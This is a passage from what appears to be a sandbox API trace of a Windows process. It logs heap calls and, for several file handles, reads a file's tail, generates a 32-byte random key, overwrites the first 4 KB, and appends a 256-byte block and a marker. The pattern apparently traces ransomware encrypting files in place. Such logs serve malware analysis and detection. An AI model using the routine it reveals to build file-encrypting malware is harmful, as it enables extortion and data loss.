(HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.642] GetProcessHeap () returned 0x4f10000 [0079.642] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.643] GetProcessHeap () returned 0x4f10000 [0079.643] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.644] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.644] WriteFile (in: hFile=0x834, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.644] WriteFile (in: hFile=0x834, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.644] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.644] GetProcessHeap () returned 0x4f10000 [0079.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.645] GetProcessHeap () returned 0x4f10000 [0079.645] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.645] CloseHandle (hObject=0x834) returned 1 [0079.646] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 46 [0079.646] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.646] ReadFile (in: hFile=0x838, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.646] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.646] GetProcessHeap () returned 0x4f10000 [0079.646] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.646] GetProcessHeap () returned 0x4f10000 [0079.646] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.646] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.646] GetProcessHeap () returned 0x4f10000 [0079.646] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.646] ReadFile (in: hFile=0x838, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.763] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.763] WriteFile (in: hFile=0x838, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.764] GetProcessHeap () returned 0x4f10000 [0079.764] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.765] GetProcessHeap () returned 0x4f10000 [0079.765] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.766] GetProcessHeap () returned 0x4f10000 [0079.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.767] GetProcessHeap () returned 0x4f10000 [0079.767] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.768] GetProcessHeap () returned 0x4f10000 [0079.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.768] SetFilePointerEx (in: hFile=0x838, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.769] WriteFile (in: hFile=0x838, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.769] WriteFile (in: hFile=0x838, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.769] GetProcessHeap () returned 0x4f10000 [0079.769] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.769] GetProcessHeap () returned 0x4f10000 [0079.769] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.769] GetProcessHeap () returned 0x4f10000 [0079.769] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.769] CloseHandle (hObject=0x838) returned 1 [0079.771] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 47 [0079.771] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.771] ReadFile (in: hFile=0x83c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.771] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.771] GetProcessHeap () returned 0x4f10000 [0079.771] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.771] GetProcessHeap () returned 0x4f10000 [0079.771] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.771] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.771] GetProcessHeap () returned 0x4f10000 [0079.771] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.771] ReadFile (in: hFile=0x83c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.820] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.820] WriteFile (in: hFile=0x83c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.820] GetProcessHeap () returned 0x4f10000 [0079.820] RtlReAllocateHeap 